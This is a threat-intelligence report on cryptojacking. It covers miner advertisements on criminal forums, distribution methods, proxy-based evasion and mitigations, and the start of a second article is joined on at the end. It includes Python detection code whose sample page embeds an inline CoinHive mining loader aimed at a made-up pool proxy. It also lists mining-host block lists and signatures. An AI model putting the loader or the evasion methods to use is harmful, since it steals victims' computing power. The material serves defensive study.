As transactions occur on a blockchain, those transactions must be validated and propagated across the network. As computers connected to the blockchain network (aka nodes) validate and propagate the transactions across the network, the miners include those transactions into "blocks" so that they can be added onto the chain. Each block is cryptographically hashed, and must include the hash of the previous block, thus forming the "chain" in blockchain. In order for miners to compute the complex hashing of each valid block, they must use a machine's computational resources. The more blocks that are mined, the more resource-intensive solving the hash becomes. To overcome this, and accelerate the mining process, many miners will join collections of computers called "pools" that work together to calculate the block hashes. The more computational resources a pool harnesses, the greater the pool's chance of mining a new block. When a new block is mined, the pool's participants are rewarded with coins. Figure 1 illustrates the roles miners play in the blockchain network.

Figure 1: The role of miners

Underground Interest

FireEye iSIGHT Intelligence has identified eCrime actor interest in cryptocurrency mining-related topics dating back to at least 2009 within underground communities. Keywords that yielded significant volumes include miner, cryptonight, stratum, xmrig, and cpuminer. While searches for certain keywords fail to provide context, the frequency of these cryptocurrency mining-related keywords shows a sharp increase in conversations beginning in 2017 (Figure 2). It is probable that at least a subset of actors prefer cryptojacking over other types of financially motivated operations due to the perception that it does not attract as much attention from law enforcement.

Figure 2: Underground keyword mentions

Monero Is King

The majority of recent cryptojacking operations have overwhelmingly focused on mining Monero, an open-source cryptocurrency based on the CryptoNote protocol, as a fork of Bytecoin. Unlike many cryptocurrencies, Monero uses a unique technology called "ring signatures," which shuffles users' public keys to eliminate the possibility of identifying a particular user, ensuring it is untraceable. Monero also employs a protocol that generates multiple, unique single-use addresses that can only be associated with the payment recipient and are unfeasible to be revealed through blockchain analysis, ensuring that Monero transactions are unable to be linked while also being cryptographically secure.

The Monero blockchain also uses what's called a "memory-hard" hashing algorithm called CryptoNight and, unlike Bitcoin's SHA-256 algorithm, it deters application-specific integrated circuit (ASIC) chip mining. This feature is critical to the Monero developers and allows for CPU mining to remain feasible and profitable. Due to these inherent privacy-focused features and CPU-mining profitability, Monero has become an attractive option for cyber criminals.

Underground Advertisements for Miners

Because most miner utilities are small, open-sourced tools, many criminals rely on crypters. Crypters are tools that employ encryption, obfuscation, and code manipulation techniques to keep their tools and malware fully undetectable (FUD). Table 1 highlights some of the most commonly repurposed Monero miner utilities.

XMR Mining Utilities

Table 1: Commonly used Monero miner utilities

The following are sample advertisements for miner utilities commonly observed in underground forums and markets. Advertisements typically range from stand-alone miner utilities to those bundled with other functions, such as credential harvesters, remote administration tool (RAT) behavior, USB spreaders, and distributed denial-of-service (DDoS) capabilities.

Sample Advertisement #1 (Smart Miner + Builder)

In early April 2018, actor "Mon£y" was observed by FireEye iSIGHT Intelligence selling a Monero miner for $80 USD – payable via Bitcoin, Bitcoin Cash, Ether, Litecoin, or Monero – that included unlimited builds, free automatic updates, and 24/7 support. The tool, dubbed Monero Madness (Figure 3), featured a setting called Madness Mode that configures the miner to only run when the infected machine is idle for at least 60 seconds. This allows the miner to work at its full potential without running the risk of being identified by the user. According to the actor, Monero Madness also provides the following features:

  • Unlimited builds
  • Builder GUI (Figure 4)
  • Written in AutoIT (no dependencies)
  • FUD
  • Safer error handling
  • Uses most recent XMRig code
  • Customizable pool/port
  • Packed with UPX
  • Works on all Windows OS (32- and 64-bit)
  • Madness Mode option

Figure 3: Monero Madness

Figure 4: Monero Madness builder

Sample Advertisement #2 (Miner + Telegram Bot Builder)

In March 2018, FireEye iSIGHT Intelligence observed actor "kent9876" advertising a Monero cryptocurrency miner called Goldig Miner (Figure 5). The actor requested payment of $23 USD for either CPU or GPU build or $50 USD for both. Payments could be made with Bitcoin, Ether, Litecoin, Dash, or PayPal. The miner ostensibly offers the following features:

  • Written in C/C++
  • Build size is small (about 100–150 kB)
  • Hides miner process from popular task managers
  • Can run without Administrator privileges (user-mode)
  • Auto-update ability
  • All data encoded with 256-bit key
  • Access to Telegram bot-builder
  • Lifetime support (24/7) via Telegram

Figure 5: Goldig Miner advertisement

Sample Advertisement #3 (Miner + Credential Stealer)

In March 2018, FireEye iSIGHT Intelligence observed actor "TH3FR3D" offering a tool dubbed Felix (Figure 6) that combines a cryptocurrency miner and credential stealer. The actor requested payment of $50 USD payable via Bitcoin or Ether. According to the advertisement, the Felix tool boasted the following features:

  • Written in C# (Version
  • Browser stealer for all major browsers (cookies, saved passwords, auto-fill)
  • Monero miner (uses pool by default, but can be configured)
  • Filezilla stealer
  • Desktop file grabber (.txt and more)
  • Can download and execute files
  • Update ability
  • USB spreader functionality
  • PHP web panel

Figure 6: Felix HTTP

Sample Advertisement #4 (Miner + RAT)

In January 2018, FireEye iSIGHT Intelligence observed actor "ups" selling a miner for any Cryptonight-based cryptocurrency (e.g., Monero and Dashcoin) for either Linux or Windows operating systems. In addition to being a miner, the tool allegedly provides local privilege escalation through the CVE-2016-0099 exploit, can download and execute remote files, and receive commands. Buyers could purchase the Windows or Linux tool for €200 EUR, or €325 EUR for both the Linux and Windows builds, payable via Monero, bitcoin, ether, or dash. According to the actor, the tool offered the following:

Windows Build Specifics

  • Written in C++ (no dependencies)
  • Miner component based on XMRig
  • Easy cryptor and VPS hosting options
  • Web panel (Figure 7)
  • Uses TLS for secured communication
  • Download and execute
  • Auto-update ability
  • Cleanup routine
  • Receive remote commands
  • Perform privilege escalation
  • Features "game mode" (mining stops if user plays game)
  • Proxy feature (based on XMRig)
  • Support (for €20/month)
  • Kills other miners from list
  • Hidden from TaskManager
  • Configurable pool, coin, and wallet (via panel)
  • Can mine the following Cryptonight-based coins:
    • Monero
    • Bytecoin
    • Electroneum
    • DigitalNote
    • Karbowanec
    • Sumokoin
    • Fantomcoin
    • Dinastycoin
    • Dashcoin
    • LeviarCoin
    • BipCoin
    • QuazarCoin
    • Bitcedi

Linux Build Specifics

  • Issues running on Linux servers (higher performance on desktop OS)
  • Compatible with AMD64 processors on Ubuntu, Debian, Mint (support for CentOS later)

Figure 7: Miner bot web panel

Sample Advertisement #5 (Miner + USB Spreader + DDoS Tool)

In August 2017, actor "MeatyBanana" was observed by FireEye iSIGHT Intelligence selling a Monero miner utility that included the ability to download and execute files and perform DDoS attacks. The actor offered the software for $30 USD, payable via Bitcoin. Ostensibly, the tool works with CPUs only and offers the following features:

  • Configurable miner pool and port (default to minergate)
  • Compatible with both 64- and 86-bit Windows OS
  • Hides from the following popular task managers:
    • Windows Task Manager
    • Process Killer
    • KillProcess
    • System Explorer
    • Process Explorer
    • AnVir
    • Process Hacker
  • Masked as a system driver
  • Does not require administrator privileges
  • No dependencies
  • Registry persistence mechanism
  • Ability to perform "tasks" (download and execute files, navigate to a site, and perform DDoS)
  • USB spreader
  • Support after purchase

The Cost of Cryptojacking

The presence of mining software on a network can generate costs on three fronts as the miner surreptitiously allocates resources:

  1. Degradation in system performance
  2. Increased cost in electricity
  3. Potential exposure of security holes

Cryptojacking targets computer processing power, which can lead to high CPU load and degraded performance. In extreme cases, CPU overload may even cause the operating system to crash. Infected machines may also attempt to infect neighboring machines and therefore generate large amounts of traffic that can overload victims' computer networks.

In the case of operational technology (OT) networks, the consequences could be severe. Supervisory control and data acquisition/industrial control systems (SCADA/ICS) environments predominantly rely on decades-old hardware and low-bandwidth networks, so even a slight increase in CPU load or network traffic could leave industrial infrastructures unresponsive, impeding operators from interacting with the controlled process in real time.

The electricity cost, measured in kilowatt-hours (kWh), is dependent upon several factors: how often the malicious miner software is configured to run, how many threads it's configured to use while running, and the number of machines mining on the victim's network. The cost per kWh is also highly variable and depends on geolocation. For example, security researchers who ran Coinhive on a machine for 24 hours found that the electrical consumption was 1.212 kWh. They estimated that this equated to electrical costs per month of $10.50 USD in the United States, $5.45 USD in Singapore, and $12.30 USD in Germany.

Cryptojacking can also highlight often overlooked security holes in a company's network. Organizations infected with cryptomining malware are also likely vulnerable to more severe exploits and attacks, ranging from ransomware to ICS-specific malware such as TRITON.

Cryptocurrency Miner Distribution Techniques

In order to maximize profits, cyber criminals widely disseminate their miners using various techniques such as incorporating cryptojacking modules into existing botnets, drive-by cryptomining attacks, the use of mobile apps containing cryptojacking code, and distributing cryptojacking utilities via spam and self-propagating utilities. Threat actors can use cryptojacking to affect numerous devices and secretly siphon their computing power. Some of the most commonly observed devices targeted by these cryptojacking schemes are:

  • User endpoint machines
  • Enterprise servers
  • Websites
  • Mobile devices
  • Industrial control systems

Cryptojacking in the Cloud

Private sector companies and governments alike are increasingly moving their data and applications to the cloud, and cyber threat groups have been moving with them. Recently, there have been various reports of actors conducting cryptocurrency mining operations specifically targeting cloud infrastructure. Cloud infrastructure is increasingly a target for cryptojacking operations because it offers actors an attack surface with large amounts of processing power in an environment where CPU usage and electricity costs are already expected to be high, thus allowing their operations to potentially go unnoticed. We assess with high confidence that threat actors will continue to target enterprise cloud networks in efforts to harness their collective computational resources for the foreseeable future.

The following are some real-world examples of cryptojacking in the cloud:

  • In February 2018, FireEye researchers published a blog detailing various techniques actors used in order to deliver malicious miner payloads (specifically to vulnerable Oracle servers) by abusing CVE-2017-10271. Refer to our blog post for more detailed information regarding the post-exploitation and pre-mining dissemination techniques used in those campaigns.
  • In March 2018, Bleeping Computer reported on the trend of cryptocurrency mining campaigns moving to the cloud via vulnerable Docker and Kubernetes applications, which are two software tools used by developers to help scale a company's cloud infrastructure. In most cases, successful attacks occur due to misconfigured applications and/or weak security controls and passwords.
  • In February 2018, Bleeping Computer also reported on hackers who breached Tesla's cloud servers to mine Monero. Attackers identified a Kubernetes console that was not password protected, allowing them to discover login credentials for the broader Tesla Amazon Web services (AWS) S3 cloud environment. Once the attackers gained access to the AWS environment via the harvested credentials, they effectively launched their cryptojacking operations.
  • Reports of cryptojacking activity due to misconfigured AWS S3 cloud storage buckets have also been observed, as was the case in the LA Times online compromise in February 2018. The presence of vulnerable AWS S3 buckets allows anyone on the internet to access and change hosted content, including the ability to inject mining scripts or other malicious software.

Incorporation of Cryptojacking into Existing Botnets

FireEye iSIGHT Intelligence has observed multiple prominent botnets such as Dridex and Trickbot incorporate cryptocurrency mining into their existing operations. Many of these families are modular in nature and have the ability to download and execute remote files, thus allowing the operators to easily turn their infections into cryptojacking bots. While these operations have traditionally been aimed at credential theft (particularly of banking credentials), adding mining modules or downloading secondary mining payloads provides the operators another avenue to generate additional revenue with little effort. This is especially true in cases where the victims were deemed unprofitable or have already been exploited in the original scheme.

The following are some real-world examples of cryptojacking being incorporated into existing botnets:

  • In early February 2018, FireEye iSIGHT Intelligence observed Dridex botnet ID 2040 download a Monero cryptocurrency miner based on the open-source XMRig miner.
  • On Feb. 12, 2018, FireEye iSIGHT Intelligence observed the banking malware IcedID injecting Monero-mining JavaScript into webpages for specific, targeted URLs. The IcedID injects launched an anonymous miner using the mining code from Coinhive's AuthedMine.
  • In late 2017, Bleeping Computer reported that security researchers with Radware observed the hacking group CodeFork leveraging the popular downloader Andromeda (aka Gamarue) to distribute a miner module to their existing botnets.
  • In late 2017, FireEye researchers observed Trickbot operators deploy a new module named "testWormDLL" that is a statically compiled copy of the popular XMRig Monero miner.
  • On Aug. 29, 2017, Security Week reported on a variant of the popular Neutrino banking Trojan, including a Monero miner module. According to their reporting, the new variant no longer aims at stealing bank card data, but instead is limited to downloading and executing modules from a remote server.

Drive-By Cryptojacking


FireEye iSIGHT Intelligence has examined various customer reports of browser-based cryptocurrency mining. Browser-based mining scripts have been observed on compromised websites, third-party advertising platforms, and have been legitimately placed on websites by publishers. While coin mining scripts can be embedded directly into a webpage's source code, they are frequently loaded from third-party websites. Identifying and detecting websites that have embedded coin mining code can be difficult since not all coin mining scripts are authorized by website publishers, such as in the case of a compromised website. Further, in cases where coin mining scripts were authorized by a website owner, they are not always clearly communicated to site visitors. At the time of reporting, the most popular script being deployed in the wild is Coinhive. Coinhive is an open-source JavaScript library that, when loaded on a vulnerable website, can mine Monero using the site visitor's CPU resources, unbeknownst to the user, as they browse the site.

The following are some real-world examples of Coinhive being deployed in the wild:

  • In September 2017, Bleeping Computer reported that the authors of SafeBrowse, a Chrome extension with more than 140,000 users, had embedded the Coinhive script in the extension's code that allowed for the mining of Monero using users' computers and without getting their consent.
  • During mid-September 2017, users on Reddit began complaining about increased CPU usage when they navigated to a popular torrent site, The Pirate Bay (TPB). The spike in CPU usage was a result of Coinhive's script being embedded within the site's footer. According to TPB operators, it was implemented as a test to generate passive revenue for the site (Figure 8).
  • In December 2017, researchers with Sucuri reported on the presence of the Coinhive script being hosted on, which allows users to publish web pages directly from GitHub repositories.
  • Other reporting disclosed the Coinhive script being embedded on the Showtime domain as well as on the LA Times website, both surreptitiously mining Monero.
  • A majority of in-browser cryptojacking activity is transitory in nature and will last only as long as the user’s web browser is open. However, researchers with Malwarebytes Labs uncovered a technique that allows for continued mining activity even after the browser window is closed. The technique leverages a pop-under window surreptitiously hidden under the taskbar. As researchers pointed out, closing the browser window may not be enough to interrupt the activity, and that more advanced actions like running the Task Manager may be required.

Figure 8: Statement from TPB operators on Coinhive script

Malvertising and Exploit Kits

Malvertisements – malicious ads on legitimate websites – commonly redirect visitors of a site to an exploit kit landing page. These landing pages are designed to scan a system for vulnerabilities, exploit those vulnerabilities, and download and execute malicious code onto the system. Notably, the malicious advertisements can be placed on legitimate sites and visitors can become infected with little to no user interaction. This distribution tactic is commonly used by threat actors to widely distribute malware and has been employed in various cryptocurrency mining operations.

The following are some real-world examples of this activity:

  • In early 2018, researchers with Trend Micro reported that a modified miner script was being disseminated across YouTube via Google's DoubleClick ad delivery platform. The script was configured to generate a random number variable between 1 and 100, and when the variable was above 10 it would launch the Coinhive script coinhive.min.js, which harnessed 80 percent of the CPU power to mine Monero. When the variable was below 10 it launched a modified Coinhive script that was also configured to harness 80 percent CPU power to mine Monero. This custom miner connected to the mining pool wss[:]//ws[.]l33tsite[.]info:8443, which was likely done to avoid Coinhive's fees.
  • In April 2018, researchers with Trend Micro also discovered a JavaScript code based on Coinhive injected into an AOL ad platform. The miner used the following private mining pools: wss[:]//wsX[.]www.datasecu[.]download/proxy and wss[:]//www[.]jqcdn[.]download:8893/proxy. Examination of other sites compromised by this campaign showed that in at least some cases the operators were hosting malicious content on unsecured AWS S3 buckets.
  • Since July 16, 2017, FireEye has observed the Neptune Exploit Kit redirect to ads for hiking clubs and MP3 converter domains. Payloads associated with the latter include Monero CPU miners that are surreptitiously installed on victims' computers.
  • In January 2018, Check Point researchers discovered a malvertising campaign leading to the Rig Exploit Kit, which served the XMRig Monero miner utility to unsuspecting victims.

Mobile Cryptojacking

In addition to targeting enterprise servers and user machines, threat actors have also targeted mobile devices for cryptojacking operations. While this technique is less common, likely due to the limited processing power afforded by mobile devices, cryptojacking on mobile devices remains a threat as sustained power consumption can damage the device and dramatically shorten the battery life. Threat actors have been observed targeting mobile devices by hosting malicious cryptojacking apps on popular app stores and through drive-by malvertising campaigns that identify users of mobile browsers.

The following are some real-world examples of mobile devices being used for cryptojacking:

  • During 2014, FireEye iSIGHT Intelligence reported on multiple Android malware apps capable of mining cryptocurrency:
    • In March 2014, Android malware named "CoinKrypt" was discovered, which mined Litecoin, Dogecoin, and CasinoCoin currencies.
    • In March 2014, another form of Android malware – "Android.Trojan.MuchSad.A" or "ANDROIDOS_KAGECOIN.HBT" – was observed mining Bitcoin, Litecoin, and Dogecoin currencies. The malware was disguised as copies of popular applications, including "Football Manager Handheld" and "TuneIn Radio." Variants of this malware have reportedly been downloaded by millions of Google Play users.
    • In April 2014, Android malware named "BadLepricon," which mined Bitcoin, was identified. The malware was reportedly being bundled into wallpaper applications hosted on the Google Play store, at least several of which received 100 to 500 installations before being removed.
    • In October 2014, a type of mobile malware called "Android Slave" was observed in China; the malware was reportedly capable of mining multiple virtual currencies.
  • In December 2017, researchers with Kaspersky Labs reported on a new multi-faceted Android malware capable of a variety of actions including mining cryptocurrencies and launching DDoS attacks. The resource load created by the malware has reportedly been high enough that it can cause the battery to bulge and physically destroy the device. The malware, dubbed Loapi, is unique in the breadth of its potential actions. It has a modular framework that includes modules for malicious advertising, texting, web crawling, Monero mining, and other activities. Loapi is thought to be the work of the same developers behind the 2015 Android malware Podec, and is usually disguised as an anti-virus app.
  • In January 2018, SophosLabs released a report detailing their discovery of 19 mobile apps hosted on Google Play that contained embedded Coinhive-based cryptojacking code, some of which were downloaded anywhere from 100,000 to 500,000 times.
  • Between November 2017 and January 2018, researchers with Malwarebytes Labs reported on a drive-by cryptojacking campaign that affected millions of Android mobile browsers to mine Monero.

Cryptojacking Spam Campaigns

FireEye iSIGHT Intelligence has observed several cryptocurrency miners distributed via spam campaigns, which is a commonly used tactic to indiscriminately distribute malware. We expect malicious actors will continue to use this method to disseminate cryptojacking code for as long as cryptocurrency mining remains profitable.

In late November 2017, FireEye researchers identified a spam campaign delivering a malicious PDF attachment designed to appear as a legitimate invoice from the largest port and container service in New Zealand: Lyttelton Port of Christchurch (Figure 9). Once opened, the PDF would launch a PowerShell script that downloaded a Monero miner from a remote host. The malicious miner connected to the pools and

Figure 9: Sample lure attachment (PDF) that downloads malicious cryptocurrency miner

Additionally, a massive cryptojacking spam campaign was discovered by FireEye researchers during January 2018 that was designed to look like legitimate financial services-related emails. The spam email directed victims to an infection link that ultimately dropped a malicious ZIP file onto the victim's machine. Contained within the ZIP file was a cryptocurrency miner utility (MD5: 80b8a2d705d5b21718a6e6efe531d493) configured to mine Monero and connect to the pool. While each of the spam email lures and associated ZIP filenames were different, the same cryptocurrency miner sample was dropped across all observed instances (Table 2).

ZIP Filenames

Table 2: Sampling of observed ZIP filenames delivering cryptocurrency miner

Cryptojacking Worms

Following the WannaCry attacks, actors began to increasingly incorporate self-propagating functionality within their malware. Some of the observed self-spreading techniques have included copying to removable drives, brute forcing SSH logins, and leveraging the leaked NSA exploit EternalBlue. Cryptocurrency mining operations significantly benefit from this functionality since wider distribution of the malware multiplies the amount of CPU resources available to them for mining. Consequently, we expect that additional actors will continue to develop this capability.

The following are some real-world examples of cryptojacking worms:

  • In May 2017, Proofpoint reported a large campaign distributing mining malware "Adylkuzz." This cryptocurrency miner was observed leveraging the EternalBlue exploit to rapidly spread itself over corporate LANs and wireless networks. This activity included the use of the DoublePulsar backdoor to download Adylkuzz. Adylkuzz infections create botnets of Windows computers that focus on mining Monero.
  • Security researchers with Sensors identified a Monero miner worm, dubbed "Rarogminer," in April 2018 that would copy itself to removable drives each time a user inserted a flash drive or external HDD.
  • In January 2018, researchers at F5 discovered a new Monero cryptomining botnet that targets Linux machines. PyCryptoMiner is a Python-based script that spreads via the SSH protocol. The bot can also use Pastebin for its command and control (C2) infrastructure. The malware spreads by trying to guess the SSH login credentials of target Linux systems. Once that is achieved, the bot deploys a simple base64-encoded Python script that connects to the C2 server to download and execute more malicious Python code.

Detection Avoidance Methods

Another trend worth noting is the use of proxies to avoid detection. The implementation of mining proxies presents an attractive option for cyber criminals because it allows them to avoid developer and commission fees of 30 percent or more. Avoiding the use of common cryptojacking services such as Coinhive, Cryptloot, and Deepminer, and instead hosting cryptojacking scripts on actor-controlled infrastructure, can circumvent many of the common strategies taken to block this activity via domain or file name blacklisting.

In March 2018, Bleeping Computer reported on the use of cryptojacking proxy servers and determined that as the use of cryptojacking proxy services increases, the effectiveness of ad blockers and browser extensions that rely on blacklists decreases significantly.

Several mining proxy tools can be found on GitHub, such as the XMRig Proxy tool, which greatly reduces the number of active pool connections, and the CoinHive Stratum Mining Proxy, which uses Coinhive’s JavaScript mining library to provide an alternative to using official Coinhive scripts and infrastructure.

In addition to using proxies, actors may also establish their own self-hosted miner apps, either on private servers or on cloud-based servers that support Node.js. Although private servers may provide some benefit over using a commercial mining service, they are still subject to easy blacklisting and require more operational effort to maintain. According to Sucuri researchers, cloud-based servers provide many benefits to actors looking to host their own mining applications, including:

  • Available free or at low-cost
  • No maintenance, just upload the crypto-miner app
  • Harder to block as blacklisting the host address could potentially impact access to legitimate services
  • Resilient to permanent takedown as new hosting accounts can more easily be created using disposable accounts

The combination of proxies and crypto-miners hosted on actor-controlled cloud infrastructure presents a significant hurdle to security professionals, as both make cryptojacking operations more difficult to detect and take down.

Mining Victim Demographics

Based on data from FireEye detection technologies, the detection of cryptocurrency miner malware has increased significantly since the beginning of 2018 (Figure 10), with the most popular mining pools being minergate and nanopool (Figure 11), and the most heavily affected country being the U.S. (Figure 12). Consistent with other reporting, the education sector remains most affected, likely due to more relaxed security controls across university networks and students taking advantage of free electricity to mine cryptocurrencies (Figure 13).

Figure 10: Cryptocurrency miner detection activity per month

Figure 11: Commonly observed pools and associated ports

Figure 12: Top 10 affected countries

Figure 13: Top five affected industries

Figure 14: Top affected industries by country

Mitigation Techniques

Unencrypted Stratum Sessions

According to security researchers at Cato Networks, in order for a miner to participate in pool mining, the infected machine will have to run native or JavaScript-based code that uses the Stratum protocol over TCP or HTTP/S. The Stratum protocol uses a publish/subscribe architecture where clients send subscription requests to join a pool and servers send messages (publish) to their subscribed clients. These messages are simple, readable, JSON-RPC messages. Subscription requests will include the following entities: id, method, and params (Figure 15). A deep packet inspection (DPI) engine can be configured to look for these parameters in order to block Stratum over unencrypted TCP.

Figure 15: Stratum subscription request parameters
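The DPI check described above, as an added example in Python that is not part of the FireEye report: it splits a reassembled plaintext TCP payload into newline-delimited JSON-RPC lines, requires the id/method/params shape, and then confirms the method is a Stratum one so that ordinary JSON-RPC traffic with the same shape is not flagged. The method list and the sample payload (including the wallet string) are constructed assumptions.

```python
import json
from dataclasses import dataclass
from typing import List, Optional

# Stratum method names from the two dialects commonly seen in miner traffic:
# the Bitcoin-style "mining.*" namespace and the Monero/XMRig-style namespace.
# Assumption: an illustrative starting set, to be extended from your own captures.
STRATUM_METHODS = {
    "mining.subscribe", "mining.authorize", "mining.submit",
    "mining.notify", "mining.set_difficulty",
    "login", "submit", "getjob", "keepalived",
}


@dataclass
class StratumHit:
    method: str
    rpc_id: object
    worker: Optional[str]   # wallet/worker string when the request carries one
    raw: str


def _worker_from_params(method: str, params) -> Optional[str]:
    """Pull the pool login (usually a wallet address) out of the request, for triage."""
    if method == "mining.authorize" and isinstance(params, list) and params:
        return str(params[0])
    if method == "login" and isinstance(params, dict):
        login = params.get("login")
        return str(login) if login is not None else None
    return None


def scan_payload(payload: bytes) -> List[StratumHit]:
    """Inspect one reassembled plaintext TCP payload for Stratum requests.

    Stratum is newline-delimited JSON-RPC, so each line is parsed on its own;
    lines that are not JSON (HTTP text, a truncated final line) are skipped.
    """
    hits: List[StratumHit] = []
    for line in payload.split(b"\n"):
        line = line.strip()
        if not line.startswith(b"{"):
            continue                                # cheap pre-filter before json.loads
        try:
            msg = json.loads(line.decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue                                # partial or malformed line
        if not isinstance(msg, dict):
            continue
        # The indicator from the text: a request object carrying id, method and params.
        if not {"id", "method", "params"}.issubset(msg):
            continue
        method = msg["method"]
        # Ordinary JSON-RPC (e.g. an Ethereum node API call) has the same shape,
        # so the method name is what separates mining from other RPC traffic.
        if not isinstance(method, str) or method not in STRATUM_METHODS:
            continue
        hits.append(StratumHit(method, msg["id"],
                               _worker_from_params(method, msg["params"]),
                               line.decode("utf-8")))
    return hits


# Constructed sample payload: an XMRig-style login, a Bitcoin-style subscribe,
# an unrelated JSON-RPC call, an HTTP line and a truncated trailing line.
SAMPLE_PAYLOAD = b"\n".join([
    b'{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"CONSTRUCTED_WALLET_ADDRESS","pass":"x","agent":"XMRig/2.6"}}',
    b'{"id":1,"method":"mining.subscribe","params":["cpuminer/2.5"]}',
    b'{"id":2,"method":"eth_blockNumber","params":[]}',
    b'GET / HTTP/1.1',
    b'{"id":3,"method":"submit","params":{"id":"abc',
])


if __name__ == "__main__":
    for hit in scan_payload(SAMPLE_PAYLOAD):
        print(f"stratum {hit.method} (id={hit.rpc_id}) worker={hit.worker}")
```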

Encrypted Stratum Sessions

In the case of JavaScript-based miners running Stratum over HTTPS, detection is more difficult for DPI engines that do not decrypt TLS traffic. To mitigate encrypted mining traffic on a network, organizations may blacklist the IP addresses and domains of popular mining pools. The downside to this is the effort of building and updating the blacklist, as locating a reliable and continually updated list of popular mining pools can prove difficult and time consuming.

Browser-Based Sessions

Identifying and detecting websites that have embedded coin mining code can be difficult since not all coin mining scripts are authorized by website publishers (as in the case of a compromised website). Further, in cases where coin mining scripts were authorized by a website owner, they are not always clearly communicated to site visitors.

As defenses evolve to prevent unauthorized coin mining activities, so will the techniques used by actors; however, blocking some of the most common indicators that we have observed to date may be effective in combatting a significant amount of the CPU-draining mining activities that customers have reported. Generic detection strategies for browser-based cryptocurrency mining include:

  • Blocking domains known to have hosted coin mining scripts
  • Blocking websites of known mining project websites, such as Coinhive
  • Blocking scripts altogether
  • Using an ad-blocker or coin mining-specific browser add-ons
  • Detecting commonly used naming conventions
  • Alerting and blocking traffic destined for known popular mining pools

Some of these detection strategies may also be of use in blocking some mining functionality included in existing financial malware as well as mining-specific malware families.
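An added example in Python (not code from the FireEye report) combining several of the strategies listed above: it collects the script tags from a page, matches external scripts against known mining-project hosts and the library's file name, and then applies content signatures to inline script, so that a copy of the library served from actor-controlled infrastructure behind a proxy (the evasion described under Detection Avoidance Methods) is still caught where a domain blacklist would miss. The host list, signatures and sample page are constructed assumptions.

```python
import re
from html.parser import HTMLParser
from typing import List, Tuple
from urllib.parse import urlparse

# Hosts of the mining projects named above and the library's usual file name.
# Assumption: an illustrative starting set, to be extended from your own telemetry.
KNOWN_MINING_HOSTS = {"coinhive.com", "authedmine.com"}
SCRIPT_NAME_RE = re.compile(r"(coinhive|authedmine)(\.min)?\.js\b", re.I)

# Content signatures: these still fire when a copy of the library is served from
# actor-controlled infrastructure behind a proxy, where a domain blacklist misses.
CONTENT_SIGNATURES = [
    re.compile(r"\bCoinHive\.(Anonymous|User)\s*\(", re.I),  # miner constructor calls
    re.compile(r"wss?://[^\s\"']+/proxy\b", re.I),          # WebSocket pool behind a Stratum proxy
    re.compile(r"\bthrottle\s*:\s*0?\.\d+"),                 # CPU-share setting typical of miner configs
]


class ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from one HTML document."""

    def __init__(self) -> None:
        super().__init__()
        self.srcs: List[str] = []
        self.inline: List[str] = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            src = dict(attrs).get("src")
            if src:
                self.srcs.append(src)
            else:
                self._in_script = True

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.inline.append(data)


def scan_html(html: str) -> List[Tuple[str, str]]:
    """Return (indicator kind, matched value) pairs for a page's script content."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    findings: List[Tuple[str, str]] = []
    for src in parser.srcs:
        host = (urlparse(src).hostname or "").lower()
        if host in KNOWN_MINING_HOSTS or any(host.endswith("." + h) for h in KNOWN_MINING_HOSTS):
            findings.append(("known-mining-host", src))
        elif SCRIPT_NAME_RE.search(src):
            findings.append(("mining-script-name", src))   # same library, self-hosted
    inline_js = "\n".join(parser.inline)
    for sig in CONTENT_SIGNATURES:
        for m in sig.finditer(inline_js):
            findings.append(("inline-signature", m.group(0)))
    return findings


# Constructed sample page: one script from a known mining host, one benign script,
# and an inline loader pointed at a pool proxy on a made-up host.
SAMPLE_PAGE = """<html><head>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script src="https://cdn.constructed-example.test/assets/analytics.js"></script>
</head><body>
<script>
  var pool = "wss://ws.constructed-proxy.test:8443/proxy";
  var miner = new CoinHive.Anonymous("SITE_KEY_PLACEHOLDER", {throttle: 0.2});
  miner.start();
</script>
</body></html>"""


if __name__ == "__main__":
    for kind, value in scan_html(SAMPLE_PAGE):
        print(f"{kind}: {value}")
```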

It is important to note that JavaScript used in browser-based cryptojacking activity cannot access files on disk. However, if a host has inadvertently navigated to a website hosting mining scripts, we recommend purging cache and other browser data.


In underground communities and marketplaces there has been significant interest in cryptojacking operations, and numerous campaigns have been observed and reported by security researchers. These developments demonstrate the continued upward trend of threat actors conducting cryptocurrency mining operations, which we expect to see a continued focus on throughout 2018. Notably, malicious cryptocurrency mining may be seen as preferable due to the perception that it does not attract as much attention from law enforcement as compared to other forms of fraud or theft. Further, victims may not realize their computer is infected beyond a slowdown in system performance.

Due to its inherent privacy-focused features and CPU-mining profitability, Monero has become one of the most attractive cryptocurrency options for cyber criminals. We believe that it will continue to be threat actors' primary cryptocurrency of choice, so long as the Monero blockchain maintains privacy-focused standards and is ASIC-resistant. If in the future the Monero protocol ever downgrades its security and privacy-focused features, then we assess with high confidence that threat actors will move to use another privacy-focused coin as an alternative.

Because of the anonymity associated with the Monero cryptocurrency and electronic wallets, as well as the availability of numerous cryptocurrency exchanges and tumblers, attribution of malicious cryptocurrency mining is very challenging for authorities, and malicious actors behind such operations typically remain unidentified. Threat actors will undoubtedly continue to demonstrate high interest in malicious cryptomining so long as it remains profitable and relatively low risk.

Move Over, Ransomware: Why Cybercriminals Are Shifting Their Focus to Cryptojacking

According to the 2018 IBM X-Force Threat Intelligence Index, the frequency and sophistication of malicious cryptocurrency mining, also called “cryptojacking,” has increased drastically in the past year. This mining is changing malicious actors’ priorities: While they had previously targeted companies’ data and financial assets, they are now seeking to extract value from organizations’ computing resources.

As a result, industries with powerful computers and relatively weak defenses — such as scientific research institutions and media companies — are suddenly caught in the crosshairs.

A Brief History of Cryptocurrency Mining

Cryptocurrency mining emerged when bitcoin, the first decentralized cryptocurrency, hit the scene in 2009. The process of mining cryptocurrency requires computationally intensive calculations to verify transactions, and miners are rewarded with cryptocurrency for this labor-intensive work. Since mining is a competitive process, it requires extensive computing power.

When bitcoin was first introduced, general-purpose central processing units (CPUs) could be used to mine it. But with each coin mined, the calculations required to mine the next coin become more complicated — demanding more computing power and more time to solve.

